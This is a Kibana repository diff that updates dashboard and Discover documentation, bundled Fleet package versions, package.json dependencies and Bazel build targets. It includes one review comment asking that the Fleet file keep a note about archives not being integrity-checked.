@@ -133,7 +135,7 @@ image::images/lens_lineChartMetricOverTimeLeftAxis_8.3.png[Left axis menu] . Open the *Bottom axis* menu, then select *None* from the *Axis title* dropdown. + [role="screenshot"] -image::images/lens_lineChartMetricOverTimeBottomAxis_8.3.png[Line chart that displays metric data over time] +image::images/lens_lineChartMetricOverTimeBottomAxis_8.3.png[Bottom axis menu] . Click *Save and return* @@ -142,6 +144,9 @@ Since you removed the axis labels, add a panel title: . Open the panel menu, then select *Edit panel title*. . In the *Panel title* field, enter `Median of bytes`, then click *Save*. ++ +[role="screenshot"] +image::images/lens_lineChartMetricOverTime_8.4.0.png[Line chart that displays metric data over time] [discrete] [[view-the-distribution-of-visitors-by-operating-system]] @@ -174,7 +179,7 @@ The chart labels are unable to display because the *request.keyword* field conta [role="screenshot"] image::images/lens_end_to_end_2_1_2.png[Table with top values of request.keyword by most unique visitors] -. In the layer pane, click *Top values of request.keyword*. +. In the layer pane, click *Top 5 values of request.keyword*. .. In the *Number of values* field, enter `10`. @@ -201,7 +206,7 @@ Create a proportional visualization that helps you determine if your users trans . In the layer pane, click *Median of bytes*. -. Click the *Sum* function, then click *Close*. +. Click the *Sum* quick function, then click *Close*. . From the *Available fields* list, drag *bytes* to the *Break down by* field in the layer pane. @@ -256,7 +261,7 @@ The distribution of a number can help you find patterns. For example, you can an . In the layer pane, click *Median of bytes*. -.. Click the *Sum* function. +.. Click the *Sum* quick function. .. In the *Name* field, enter `Transferred bytes`. 
@@ -293,7 +298,7 @@ Add a panel title: Create a filter for each website traffic source: -. Click the *Filters* function. +. Click *Filters*. . Click *All records*, enter the following in the query bar, then press Return: @@ -319,14 +324,14 @@ Add the user geography grouping: . From the *Available fields* list, drag *geo.srcdest* to the workspace. -. To change the *Group by* order, drag *Top values of geo.srcdest* in the layer pane so that appears first. +. To change the *Group by* order, drag *Top 3 values of geo.srcdest* in the layer pane so that appears first. + [role="screenshot"] image::images/lens_end_to_end_7_2.png[Treemap visualization] Remove the documents that do not match the filter criteria: -. In the layer pane, click *Top values of geo.srcdest*. +. In the layer pane, click *Top 3 values of geo.srcdest*. . Click *Advanced*, deselect *Group other values as "Other"*, then click *Close*. + @@ -358,7 +363,7 @@ Decrease the size of the following panels, then move the panels to the first row * *Website traffic* + [role="screenshot"] -image::images/lens_logsDashboard_8.3.png[Logs dashboard] +image::images/lens_logsDashboard_8.4.0.png[Logs dashboard] [discrete] === Save the dashboard diff --git a/docs/user/dashboard/vega.asciidoc b/docs/user/dashboard/vega.asciidoc index 9c58b9d0ecf49..371b8b949c72a 100644 --- a/docs/user/dashboard/vega.asciidoc +++ b/docs/user/dashboard/vega.asciidoc @@ -40,9 +40,11 @@ As you edit the specs, work in small steps, and frequently save your work. Small Before starting, add the eCommerce sample data that you'll use in your spec, then create the dashboard. -. From the {kib} *Home* page, click *Try our sample data*. +. On the home page, click *Try sample data*. -. From *eCommerce sample data*, click *Add data*. +. Click *Other sample data sets*. + +. On the *Sample eCommerce orders* card, click *Add data*. . Open the main menu, then click *Dashboard*. 
diff --git a/docs/user/discover.asciidoc b/docs/user/discover.asciidoc index 26a6eafd8086d..fab5dc372feac 100644 --- a/docs/user/discover.asciidoc +++ b/docs/user/discover.asciidoc @@ -54,7 +54,7 @@ Tell {kib} where to find the data you want to explore, and then specify the time + {kib} uses a <> to tell it where to find your {es} data. -To view the ecommerce sample data, open the {data-source} menu, and select **kibana_sample_data_ecommerce**. +To view the ecommerce sample data, open the {data-source} menu, and then select **Kibana Sample Data Ecommerce**. + [role="screenshot"] image::images/discover-data-view.png[How to set the {data-source} in Discover, width=50%] @@ -118,7 +118,7 @@ You can add a runtime field to your {data-source} from inside of **Discover**, and then use that field for analysis and visualizations, the same way you do with other fields. -. Open the data view menu, and then click *Add a field to this data view*. +. In the sidebar, click *Add a field*. . In the *Create field* form, enter `hello` for the name. @@ -191,7 +191,7 @@ and more. Exclude documents where day of week is not Wednesday: -. Click image:images/add-icon.png[Add icon] to the left of the query bar. +. Click image:images/add-icon.png[Add icon] next to the query bar. . In the *Add filter* pop-up, set *Field* to *day_of_week*, *Operator* to *is not*, and *Value* to *Wednesday*. + [role="screenshot"] @@ -289,7 +289,7 @@ The *Create rule* form is pre-filled with the latest query sent to {es}. . Click *Save*. -For more about this and other rules provided in {kib} {alert-features}, go to <>. +For more about this and other rules provided in {alert-features}, go to <>. [float] diff --git a/docs/user/security/api-keys/index.asciidoc b/docs/user/security/api-keys/index.asciidoc index 3011f17ee08c8..3efb2cdeef6ca 100644 --- a/docs/user/security/api-keys/index.asciidoc +++ b/docs/user/security/api-keys/index.asciidoc 
@@ -47,7 +47,7 @@ curl --location --request GET 'http://localhost:5601/api/security/role' \ [IMPORTANT] ============================================================================ -API keys are intended for programatic access to {kib} and {es). Do not use API keys to authenticate access via a web browser. +API keys are intended for programmatic access to {kib} and {es}. Do not use API keys to authenticate access via a web browser. ============================================================================ [float] diff --git a/docs/user/security/authentication/index.asciidoc b/docs/user/security/authentication/index.asciidoc index 9b3d4b0f831f8..d0280ca8e2f40 100644 --- a/docs/user/security/authentication/index.asciidoc +++ b/docs/user/security/authentication/index.asciidoc @@ -396,7 +396,7 @@ This type of authentication is usually useful for machine-to-machine interaction [IMPORTANT] ============================================================================ -API keys are intended for programatic access to {kib} and {es). Do not use API keys to authenticate access via a web browser. +API keys are intended for programmatic access to {kib} and {es}. Do not use API keys to authenticate access via a web browser. ============================================================================ diff --git a/fleet_packages.json b/fleet_packages.json index e082082c724db..c44aa910e6a0f 100644 --- a/fleet_packages.json +++ b/fleet_packages.json 
@@ -1,15 +1,14 @@ /* - Packages in this file are considered "bundled" and are installed as part of Fleet's setup process. Each entry points to a valid version name - avaiable in the Elastic Package Registry service, and must include a sha-512 checksum of the `.zip` archive for the given package. + Packages listed in this file are "bundled" with Kibana's built distributable, and are available + on disk rather than only in the configured package registry service. This allows Kibana to install + "stack-aligned" packages or those that are installed by default in an airgapped or offline environment. - You may opt in to using the "snapshot" environment of the EPR service by passing the `--use-epr-snapshot-registry` flag to `yarn build`. This will - cause the package archive download to pull from the "spapshot" environment instead of the "production" environment. Be aware that not all packages - exist in the snapshot environment, so you may have errors when fetching package versions. It's recommended to alter this file to contain _only_ the - packages you're testing when using the snapshot environment. + Packages will be fetched from https://epr-snapshot.elastic.co by default. This can be overridden + via the `--epr-registry=production` command line argument when building Kibana. Fetching from the + snapshot registry allows Kibana to bundle packages that have yet to be published to production in + order to prepare build candidates for the next release. - These files don't include any kind of checksum, but they should eventually include a package signature as introduced in https://github.com/elastic/elastic-package/issues/583 - in order to verify package integrity. */ [ @@ -23,7 +22,7 @@ }, { "name": "endpoint", - "version": "8.3.0" + "version": "8.4.1" }, { "name": "fleet_server", @@ -31,6 +30,6 @@ }, { "name": "synthetics", - "version": "0.10.1" + "version": "0.10.2" } ] 
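Review bot: The rewritten header comment at the top of this hunk says nothing about how the integrity of a bundled package archive is verified, while the note it drops stated that entries carry no checksum and that a package signature was still to be introduced (https://github.com/elastic/elastic-package/issues/583). The entries in the later hunks of this file still list only `name` and `version`, and the new text makes the snapshot registry the default source, so a reader now has no indication of whether what the build downloads is checked before it ships inside the distributable. If that is still the case, keep one sentence saying so, e.g. `Entries carry no checksum or signature, so package archives are not integrity-checked when fetched at build time (see https://github.com/elastic/elastic-package/issues/583).`; if verification has since been added elsewhere, say where.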
diff --git a/legacy_rfcs/text/0015_bazel.md b/legacy_rfcs/text/0015_bazel.md index 82c93c3c7e9c1..390a2d68eb7ab 100644 --- a/legacy_rfcs/text/0015_bazel.md +++ b/legacy_rfcs/text/0015_bazel.md @@ -191,9 +191,9 @@ A `BUILD.bazel` file will be added to the root of each package defining a `build The `@kbn/pm` package was updated in https://github.com/elastic/kibana/pull/89961 to run the new packages build target, invoked by calling `bazel build //packages:build`, before executing the existing legacy package builds. -The build targets will no longer reside within the package themselves and instead will be within the `bazel/bin` directory. To account for this, any defined dependency will need to be updated to reference the new directory (example: `link:bazel/bin/packages/elastic-datemath`). While also in this transition period, the build will need to copy over the packages from `bazel/bin` into the `node_modules` of the build target. +The build targets will no longer reside within the package themselves and instead will be within the `bazel/bin` directory. To account for this, any defined dependency will need to be updated to reference the new directory (example: `link:bazel/bin/packages/kbn-datemath`). While also in this transition period, the build will need to copy over the packages from `bazel/bin` into the `node_modules` of the build target. -Example package BUILD.bazel for `packages/elastic-datemath`: +Example package BUILD.bazel for `packages/kbn-datemath`: ```python load("@build_bazel_rules_nodejs//:index.bzl", "pkg_npm") diff --git a/nav-kibana-dev.docnav.json b/nav-kibana-dev.docnav.json index 9aa3530578857..c1ea6f702483c 100644 --- a/nav-kibana-dev.docnav.json +++ b/nav-kibana-dev.docnav.json @@ -94,6 +94,9 @@ }, { "id": "kibDevKeyConceptsNavigation" + }, + { + "id": "kibDevDocsEmbeddables" } ] }, @@ -429,6 +432,9 @@ }, { "id": "kibVisualizationsPluginApi" + }, + { + "id": "kibDevDocsOpsTest" } ] }, 
@@ -563,6 +569,9 @@
 },
 {
 "id": "kibDevDocsOpsManagedVscodeConfigCli"
+ },
+ {
+ "id": "kibDevDocsOpsTest"
 }
 ]
 }
diff --git a/package.json b/package.json
index 8e8bdcedc01c1..637aa2a26158b 100644
--- a/package.json
+++ b/package.json
@@ -102,8 +102,7 @@
 "@dnd-kit/utilities": "^2.0.0",
 "@elastic/apm-rum": "^5.12.0",
 "@elastic/apm-rum-react": "^1.4.2",
- "@elastic/apm-synthtrace": "link:bazel-bin/packages/elastic-apm-synthtrace",
- "@elastic/charts": "47.1.1",
+ "@elastic/charts": "47.2.0",
 "@elastic/datemath": "5.0.3",
 "@elastic/elasticsearch": "npm:@elastic/elasticsearch-canary@8.3.0-canary.1",
 "@elastic/ems-client": "8.3.3",
@@ -113,7 +112,6 @@
 "@elastic/numeral": "^2.5.1",
 "@elastic/react-search-ui": "^1.14.0",
 "@elastic/request-crypto": "2.0.1",
- "@elastic/safer-lodash-set": "link:bazel-bin/packages/elastic-safer-lodash-set",
 "@elastic/search-ui-app-search-connector": "^1.14.0",
 "@emotion/cache": "^11.9.3",
 "@emotion/css": "^11.9.0",
@@ -139,7 +137,9 @@
 "@kbn/analytics-shippers-elastic-v3-server": "link:bazel-bin/packages/analytics/shippers/elastic_v3/server",
 "@kbn/analytics-shippers-fullstory": "link:bazel-bin/packages/analytics/shippers/fullstory",
 "@kbn/apm-config-loader": "link:bazel-bin/packages/kbn-apm-config-loader",
+ "@kbn/apm-synthtrace": "link:bazel-bin/packages/kbn-apm-synthtrace",
 "@kbn/apm-utils": "link:bazel-bin/packages/kbn-apm-utils",
+ "@kbn/chart-icons": "link:bazel-bin/packages/kbn-chart-icons",
 "@kbn/coloring": "link:bazel-bin/packages/kbn-coloring",
 "@kbn/config": "link:bazel-bin/packages/kbn-config",
 "@kbn/config-mocks": "link:bazel-bin/packages/kbn-config-mocks",
@@ -281,6 +281,7 @@
 "@kbn/plugin-discovery": "link:bazel-bin/packages/kbn-plugin-discovery",
 "@kbn/react-field": "link:bazel-bin/packages/kbn-react-field",
 "@kbn/rule-data-utils": "link:bazel-bin/packages/kbn-rule-data-utils",
+ "@kbn/safer-lodash-set": "link:bazel-bin/packages/kbn-safer-lodash-set",
 "@kbn/securitysolution-autocomplete": "link:bazel-bin/packages/kbn-securitysolution-autocomplete",
 "@kbn/securitysolution-es-utils": "link:bazel-bin/packages/kbn-securitysolution-es-utils",
 "@kbn/securitysolution-hook-utils": "link:bazel-bin/packages/kbn-securitysolution-hook-utils",
@@ -306,7 +307,6 @@
 "@kbn/shared-ux-card-no-data": "link:bazel-bin/packages/shared-ux/card/no_data/impl",
 "@kbn/shared-ux-card-no-data-mocks": "link:bazel-bin/packages/shared-ux/card/no_data/mocks",
 "@kbn/shared-ux-card-no-data-types": "link:bazel-bin/packages/shared-ux/card/no_data/types",
- "@kbn/shared-ux-components": "link:bazel-bin/packages/kbn-shared-ux-components",
 "@kbn/shared-ux-link-redirect-app": "link:bazel-bin/packages/shared-ux/link/redirect_app/impl",
 "@kbn/shared-ux-link-redirect-app-mocks": "link:bazel-bin/packages/shared-ux/link/redirect_app/mocks",
 "@kbn/shared-ux-link-redirect-app-types": "link:bazel-bin/packages/shared-ux/link/redirect_app/types",
@@ -316,12 +316,20 @@
 "@kbn/shared-ux-page-kibana-no-data": "link:bazel-bin/packages/shared-ux/page/kibana_no_data/impl",
 "@kbn/shared-ux-page-kibana-no-data-mocks": "link:bazel-bin/packages/shared-ux/page/kibana_no_data/mocks",
 "@kbn/shared-ux-page-kibana-no-data-types": "link:bazel-bin/packages/shared-ux/page/kibana_no_data/types",
+ "@kbn/shared-ux-page-kibana-template": "link:bazel-bin/packages/shared-ux/page/kibana_template/impl",
+ "@kbn/shared-ux-page-kibana-template-mocks": "link:bazel-bin/packages/shared-ux/page/kibana_template/mocks",
+ "@kbn/shared-ux-page-kibana-template-types": "link:bazel-bin/packages/shared-ux/page/kibana_template/types",
+ "@kbn/shared-ux-page-no-data": "link:bazel-bin/packages/shared-ux/page/no_data/impl",
+ "@kbn/shared-ux-page-no-data-config": "link:bazel-bin/packages/shared-ux/page/no_data_config/impl",
+ "@kbn/shared-ux-page-no-data-config-mocks": "link:bazel-bin/packages/shared-ux/page/no_data_config/mocks",
+ "@kbn/shared-ux-page-no-data-config-types": "link:bazel-bin/packages/shared-ux/page/no_data_config/types",
+ "@kbn/shared-ux-page-no-data-mocks": "link:bazel-bin/packages/shared-ux/page/no_data/mocks",
+ "@kbn/shared-ux-page-no-data-types": "link:bazel-bin/packages/shared-ux/page/no_data/types",
 "@kbn/shared-ux-page-solution-nav": "link:bazel-bin/packages/shared-ux/page/solution_nav",
 "@kbn/shared-ux-prompt-no-data-views": "link:bazel-bin/packages/shared-ux/prompt/no_data_views/impl",
 "@kbn/shared-ux-prompt-no-data-views-mocks": "link:bazel-bin/packages/shared-ux/prompt/no_data_views/mocks",
 "@kbn/shared-ux-prompt-no-data-views-types": "link:bazel-bin/packages/shared-ux/prompt/no_data_views/types",
- "@kbn/shared-ux-services": "link:bazel-bin/packages/kbn-shared-ux-services",
- "@kbn/shared-ux-storybook": "link:bazel-bin/packages/kbn-shared-ux-storybook",
+ "@kbn/shared-ux-storybook-config": "link:bazel-bin/packages/shared-ux/storybook/config",
 "@kbn/shared-ux-storybook-mock": 
"link:bazel-bin/packages/shared-ux/storybook/mock", "@kbn/shared-ux-utility": "link:bazel-bin/packages/kbn-shared-ux-utility", "@kbn/std": "link:bazel-bin/packages/kbn-std", @@ -401,7 +409,7 @@ "deep-freeze-strict": "^1.1.1", "deepmerge": "^4.2.2", "del": "^5.1.0", - "elastic-apm-node": "^3.37.0", + "elastic-apm-node": "^3.38.0", "email-addresses": "^5.0.0", "execa": "^4.0.2", "expiry-js": "0.1.7", @@ -538,7 +546,6 @@ "redux-saga": "^1.1.3", "redux-thunk": "^2.3.0", "redux-thunks": "^1.0.0", - "regenerator-runtime": "^0.13.3", "remark-parse": "^8.0.3", "remark-stringify": "^8.0.3", "require-in-the-middle": "^5.1.0", 
@@ -579,30 +586,32 @@
 "vinyl": "^2.2.0",
 "whatwg-fetch": "^3.0.0",
 "xml2js": "^0.4.22",
+ "xterm": "^4.18.0",
+ "xterm-addon-fit": "^0.5.0",
 "yauzl": "^2.10.0"
 },
 "devDependencies": {
 "@apidevtools/swagger-parser": "^10.0.3",
- "@babel/cli": "^7.18.9",
- "@babel/core": "^7.18.9",
+ "@babel/cli": "^7.18.10",
+ "@babel/core": "^7.18.10",
 "@babel/eslint-parser": "^7.18.9",
- "@babel/eslint-plugin": "^7.17.7",
- "@babel/generator": "^7.18.9",
+ "@babel/eslint-plugin": "^7.18.10",
+ "@babel/generator": "^7.18.12",
 "@babel/helper-plugin-utils": "^7.18.9",
- "@babel/parser": "^7.18.9",
+ "@babel/parser": "^7.18.11",
 "@babel/plugin-proposal-class-properties": "^7.18.6",
 "@babel/plugin-proposal-export-namespace-from": "^7.18.9",
 "@babel/plugin-proposal-nullish-coalescing-operator": "^7.18.6",
 "@babel/plugin-proposal-object-rest-spread": "^7.18.9",
 "@babel/plugin-proposal-optional-chaining": "^7.18.9",
 "@babel/plugin-proposal-private-methods": "^7.18.6",
- "@babel/plugin-transform-runtime": "^7.18.9",
- "@babel/preset-env": "^7.18.9",
+ "@babel/plugin-transform-runtime": "^7.18.10",
+ "@babel/preset-env": "^7.18.10",
 "@babel/preset-react": "^7.18.6",
 "@babel/preset-typescript": "^7.18.6",
 "@babel/register": "^7.18.9",
- "@babel/traverse": "^7.18.9",
- "@babel/types": "^7.18.9",
+ "@babel/traverse": "^7.18.11",
+ "@babel/types": "^7.18.10",
 "@bazel/ibazel": "^0.16.2",
 "@bazel/typescript": "4.6.2",
 "@cypress/code-coverage": "^3.9.12",
@@ -723,7 +732,6 @@
 "@types/deep-freeze-strict": "^1.1.0",
 "@types/delete-empty": "^2.0.0",
 "@types/ejs": "^3.0.6",
- "@types/elastic__apm-synthtrace": "link:bazel-bin/packages/elastic-apm-synthtrace/npm_module_types",
 "@types/enzyme": "^3.10.8",
 "@types/eslint": "^7.28.0",
 "@types/express": "^4.17.13",
@@ -773,10 +781,12 @@
 "@types/kbn__analytics-shippers-elastic-v3-server": "link:bazel-bin/packages/analytics/shippers/elastic_v3/server/npm_module_types",
 "@types/kbn__analytics-shippers-fullstory": "link:bazel-bin/packages/analytics/shippers/fullstory/npm_module_types",
 "@types/kbn__apm-config-loader": "link:bazel-bin/packages/kbn-apm-config-loader/npm_module_types",
+ "@types/kbn__apm-synthtrace": "link:bazel-bin/packages/kbn-apm-synthtrace/npm_module_types",
 "@types/kbn__apm-utils": "link:bazel-bin/packages/kbn-apm-utils/npm_module_types",
 "@types/kbn__axe-config": "link:bazel-bin/packages/kbn-axe-config/npm_module_types",
 "@types/kbn__bazel-packages": "link:bazel-bin/packages/kbn-bazel-packages/npm_module_types",
 "@types/kbn__bazel-runner": "link:bazel-bin/packages/kbn-bazel-runner/npm_module_types",
+ "@types/kbn__chart-icons": "link:bazel-bin/packages/kbn-chart-icons/npm_module_types",
 "@types/kbn__ci-stats-core": "link:bazel-bin/packages/kbn-ci-stats-core/npm_module_types",
 "@types/kbn__ci-stats-performance-metrics": "link:bazel-bin/packages/kbn-ci-stats-performance-metrics/npm_module_types",
 "@types/kbn__ci-stats-reporter": "link:bazel-bin/packages/kbn-ci-stats-reporter/npm_module_types",
@@ -972,7 +982,6 @@
 "@types/kbn__shared-ux-card-no-data": "link:bazel-bin/packages/shared-ux/card/no_data/impl/npm_module_types",
 "@types/kbn__shared-ux-card-no-data-mocks": "link:bazel-bin/packages/shared-ux/card/no_data/mocks/npm_module_types",
 "@types/kbn__shared-ux-card-no-data-types": "link:bazel-bin/packages/shared-ux/card/no_data/types/npm_module_types",
- "@types/kbn__shared-ux-components": "link:bazel-bin/packages/kbn-shared-ux-components/npm_module_types",
 "@types/kbn__shared-ux-link-redirect-app": "link:bazel-bin/packages/shared-ux/link/redirect_app/impl/npm_module_types",
 "@types/kbn__shared-ux-link-redirect-app-mocks": "link:bazel-bin/packages/shared-ux/link/redirect_app/mocks/npm_module_types",
 "@types/kbn__shared-ux-link-redirect-app-types": "link:bazel-bin/packages/shared-ux/link/redirect_app/types/npm_module_types",
@@ -982,12 +991,20 @@
 "@types/kbn__shared-ux-page-kibana-no-data": "link:bazel-bin/packages/shared-ux/page/kibana_no_data/impl/npm_module_types",
 "@types/kbn__shared-ux-page-kibana-no-data-mocks": "link:bazel-bin/packages/shared-ux/page/kibana_no_data/mocks/npm_module_types",
 "@types/kbn__shared-ux-page-kibana-no-data-types": "link:bazel-bin/packages/shared-ux/page/kibana_no_data/types/npm_module_types",
+ "@types/kbn__shared-ux-page-kibana-template": "link:bazel-bin/packages/shared-ux/page/kibana_template/impl/npm_module_types",
+ "@types/kbn__shared-ux-page-kibana-template-mocks": "link:bazel-bin/packages/shared-ux/page/kibana_template/mocks/npm_module_types",
+ "@types/kbn__shared-ux-page-kibana-template-types": "link:bazel-bin/packages/shared-ux/page/kibana_template/types/npm_module_types",
+ "@types/kbn__shared-ux-page-no-data": "link:bazel-bin/packages/shared-ux/page/no_data/impl/npm_module_types",
+ "@types/kbn__shared-ux-page-no-data-config": "link:bazel-bin/packages/shared-ux/page/no_data_config/impl/npm_module_types",
+ "@types/kbn__shared-ux-page-no-data-config-mocks": "link:bazel-bin/packages/shared-ux/page/no_data_config/mocks/npm_module_types",
+ "@types/kbn__shared-ux-page-no-data-config-types": "link:bazel-bin/packages/shared-ux/page/no_data_config/types/npm_module_types",
+ "@types/kbn__shared-ux-page-no-data-mocks": "link:bazel-bin/packages/shared-ux/page/no_data/mocks/npm_module_types",
+ "@types/kbn__shared-ux-page-no-data-types": "link:bazel-bin/packages/shared-ux/page/no_data/types/npm_module_types",
 "@types/kbn__shared-ux-page-solution-nav": "link:bazel-bin/packages/shared-ux/page/solution_nav/npm_module_types",
 "@types/kbn__shared-ux-prompt-no-data-views": "link:bazel-bin/packages/shared-ux/prompt/no_data_views/impl/npm_module_types",
 "@types/kbn__shared-ux-prompt-no-data-views-mocks": "link:bazel-bin/packages/shared-ux/prompt/no_data_views/mocks/npm_module_types",
 "@types/kbn__shared-ux-prompt-no-data-views-types": 
"link:bazel-bin/packages/shared-ux/prompt/no_data_views/types/npm_module_types", - "@types/kbn__shared-ux-services": "link:bazel-bin/packages/kbn-shared-ux-services/npm_module_types", - "@types/kbn__shared-ux-storybook": "link:bazel-bin/packages/kbn-shared-ux-storybook/npm_module_types", + "@types/kbn__shared-ux-storybook-config": "link:bazel-bin/packages/shared-ux/storybook/config/npm_module_types", "@types/kbn__shared-ux-storybook-mock": "link:bazel-bin/packages/shared-ux/storybook/mock/npm_module_types", "@types/kbn__shared-ux-utility": "link:bazel-bin/packages/kbn-shared-ux-utility/npm_module_types", "@types/kbn__some-dev-log": "link:bazel-bin/packages/kbn-some-dev-log/npm_module_types", @@ -1176,9 +1193,7 @@ "file-loader": "^4.2.0", "form-data": "^4.0.0", "geckodriver": "^3.0.2", - "gulp-babel": "^8.0.0", "gulp-brotli": "^3.0.0", - "gulp-gzip": "^1.4.2", "gulp-postcss": "^9.0.1", "gulp-sourcemaps": "2.6.5", "gulp-terser": "^2.1.0", @@ -1199,6 +1214,7 @@ "jest-diff": "^26.6.2", "jest-environment-jsdom": "^26.6.2", "jest-environment-jsdom-thirteen": "^1.0.1", + "jest-mock": "^26.6.2", "jest-raw-loader": "^1.0.1", "jest-runtime": "^26", "jest-silent-reporter": "^0.5.0", @@ -1234,6 +1250,7 @@ "pbf": "3.2.1", "peggy": "^1.2.0", "pirates": "^4.0.1", + "piscina": "^3.2.0", "playwright": "^1.17.1", "pngjs": "^3.4.0", "postcss": "^8.4.14", @@ -1242,6 +1259,7 @@ "postcss-scss": "^4.0.4", "prettier": "^2.7.1", "pretty-format": "^27.5.1", + "proxy": "^1.0.2", "q": "^1.5.1", "raw-loader": "^3.1.0", "react-test-renderer": "^16.14.0", @@ -1261,6 +1279,7 @@ "superagent": "^3.8.2", "supertest": "^3.1.0", "supports-color": "^7.0.0", + "svgo": "^2.8.0", "tape": "^5.0.1", "tempy": "^0.3.0", "terser": "^5.14.1", diff --git a/packages/BUILD.bazel b/packages/BUILD.bazel index c0957f7ee2bb8..a9a0377b679dd 100644 --- a/packages/BUILD.bazel +++ b/packages/BUILD.bazel 
@@ -116,8 +116,6 @@ filegroup(
 "//packages/core/ui-settings/core-ui-settings-browser-mocks:build",
 "//packages/core/ui-settings/core-ui-settings-browser:build",
 "//packages/core/ui-settings/core-ui-settings-common:build",
- "//packages/elastic-apm-synthtrace:build",
- "//packages/elastic-safer-lodash-set:build",
 "//packages/home/sample_data_card:build",
 "//packages/home/sample_data_tab:build",
 "//packages/home/sample_data_types:build",
@@ -127,12 +125,14 @@ filegroup(
 "//packages/kbn-ambient-ui-types:build",
 "//packages/kbn-analytics:build",
 "//packages/kbn-apm-config-loader:build",
+ "//packages/kbn-apm-synthtrace:build",
 "//packages/kbn-apm-utils:build",
 "//packages/kbn-axe-config:build",
 "//packages/kbn-babel-plugin-synthetic-packages:build",
 "//packages/kbn-babel-preset:build",
 "//packages/kbn-bazel-packages:build",
 "//packages/kbn-bazel-runner:build",
+ "//packages/kbn-chart-icons:build",
 "//packages/kbn-ci-stats-core:build",
 "//packages/kbn-ci-stats-performance-metrics:build",
 "//packages/kbn-ci-stats-reporter:build",
@@ -192,6 +192,7 @@ filegroup(
 "//packages/kbn-repo-source-classifier-cli:build",
 "//packages/kbn-repo-source-classifier:build",
 "//packages/kbn-rule-data-utils:build",
+ "//packages/kbn-safer-lodash-set:build",
 "//packages/kbn-securitysolution-autocomplete:build",
 "//packages/kbn-securitysolution-es-utils:build",
 "//packages/kbn-securitysolution-hook-utils:build",
@@ -209,9 +210,6 @@ filegroup(
 "//packages/kbn-server-http-tools:build",
 "//packages/kbn-server-route-repository:build",
 "//packages/kbn-shared-svg:build",
- "//packages/kbn-shared-ux-components:build",
- "//packages/kbn-shared-ux-services:build",
- "//packages/kbn-shared-ux-storybook:build",
 "//packages/kbn-shared-ux-utility:build",
 "//packages/kbn-some-dev-log:build",
 "//packages/kbn-sort-package-json:build",
@@ -257,10 +255,20 @@ filegroup(
 "//packages/shared-ux/page/kibana_no_data/impl:build",
 "//packages/shared-ux/page/kibana_no_data/mocks:build",
 "//packages/shared-ux/page/kibana_no_data/types:build",
+ "//packages/shared-ux/page/kibana_template/impl:build",
+ "//packages/shared-ux/page/kibana_template/mocks:build",
+ "//packages/shared-ux/page/kibana_template/types:build",
+ "//packages/shared-ux/page/no_data_config/impl:build",
+ "//packages/shared-ux/page/no_data_config/mocks:build",
+ "//packages/shared-ux/page/no_data_config/types:build",
+ "//packages/shared-ux/page/no_data/impl:build",
+ "//packages/shared-ux/page/no_data/mocks:build",
+ "//packages/shared-ux/page/no_data/types:build",
 "//packages/shared-ux/page/solution_nav:build",
 "//packages/shared-ux/prompt/no_data_views/impl:build",
 "//packages/shared-ux/prompt/no_data_views/mocks:build",
 "//packages/shared-ux/prompt/no_data_views/types:build",
+ "//packages/shared-ux/storybook/config:build",
 "//packages/shared-ux/storybook/mock:build",
 "//x-pack/packages/ml/agg_utils:build",
 "//x-pack/packages/ml/aiops_components:build",
@@ -381,18 +389,18 @@ filegroup(
 "//packages/core/ui-settings/core-ui-settings-browser-mocks:build_types",
 "//packages/core/ui-settings/core-ui-settings-browser:build_types",
 "//packages/core/ui-settings/core-ui-settings-common:build_types",
- "//packages/elastic-apm-synthtrace:build_types",
- "//packages/elastic-safer-lodash-set:build_types",
 "//packages/home/sample_data_card:build_types",
 "//packages/home/sample_data_tab:build_types",
 "//packages/kbn-ace:build_types",
 "//packages/kbn-alerts:build_types",
 "//packages/kbn-analytics:build_types",
 "//packages/kbn-apm-config-loader:build_types",
+ "//packages/kbn-apm-synthtrace:build_types",
 "//packages/kbn-apm-utils:build_types",
 "//packages/kbn-axe-config:build_types",
 "//packages/kbn-bazel-packages:build_types",
 "//packages/kbn-bazel-runner:build_types",
+ "//packages/kbn-chart-icons:build_types",
 "//packages/kbn-ci-stats-core:build_types",
 "//packages/kbn-ci-stats-performance-metrics:build_types",
 "//packages/kbn-ci-stats-reporter:build_types",
@@ -447,6 +455,7 @@ filegroup(
 "//packages/kbn-repo-source-classifier-cli:build_types",
 "//packages/kbn-repo-source-classifier:build_types",
 "//packages/kbn-rule-data-utils:build_types",
+ "//packages/kbn-safer-lodash-set:build_types",
 "//packages/kbn-securitysolution-autocomplete:build_types",
 "//packages/kbn-securitysolution-es-utils:build_types",
 "//packages/kbn-securitysolution-hook-utils:build_types",
@@ -464,9 +473,6 @@ filegroup(
 "//packages/kbn-server-http-tools:build_types",
 "//packages/kbn-server-route-repository:build_types",
 "//packages/kbn-shared-svg:build_types",
- "//packages/kbn-shared-ux-components:build_types",
- "//packages/kbn-shared-ux-services:build_types",
- "//packages/kbn-shared-ux-storybook:build_types",
 "//packages/kbn-shared-ux-utility:build_types",
 "//packages/kbn-some-dev-log:build_types",
 "//packages/kbn-sort-package-json:build_types",
@@ -501,9 +507,16 @@ filegroup(
 "//packages/shared-ux/page/analytics_no_data/mocks:build_types",
 "//packages/shared-ux/page/kibana_no_data/impl:build_types",
 "//packages/shared-ux/page/kibana_no_data/mocks:build_types",
+ "//packages/shared-ux/page/kibana_template/impl:build_types",
+ "//packages/shared-ux/page/kibana_template/mocks:build_types",
+ "//packages/shared-ux/page/no_data_config/impl:build_types",
+ "//packages/shared-ux/page/no_data_config/mocks:build_types",
+ "//packages/shared-ux/page/no_data/impl:build_types",
+ "//packages/shared-ux/page/no_data/mocks:build_types",
 "//packages/shared-ux/page/solution_nav:build_types",
 "//packages/shared-ux/prompt/no_data_views/impl:build_types",
 "//packages/shared-ux/prompt/no_data_views/mocks:build_types",
+ "//packages/shared-ux/storybook/config:build_types",
 "//packages/shared-ux/storybook/mock:build_types",
 "//x-pack/packages/ml/agg_utils:build_types",
 "//x-pack/packages/ml/aiops_components:build_types",
diff --git a/packages/core/config/core-config-server-internal/BUILD.bazel b/packages/core/config/core-config-server-internal/BUILD.bazel
index d2580d6736a76..7bc32e4198ab1 100644
--- a/packages/core/config/core-config-server-internal/BUILD.bazel
+++ b/packages/core/config/core-config-server-internal/BUILD.bazel
@@ -26,7 +26,7 @@ NPM_MODULE_EXTRA_FILES = [
 ]
 RUNTIME_DEPS = [
- "//packages/elastic-safer-lodash-set",
+ "//packages/kbn-safer-lodash-set",
 "//packages/kbn-config",
 "//packages/core/base/core-base-server-internal",
 "//packages/kbn-config-mocks",
@@ -36,7 +36,7 @@ RUNTIME_DEPS = [
 TYPES_DEPS = [
 "@npm//@types/node",
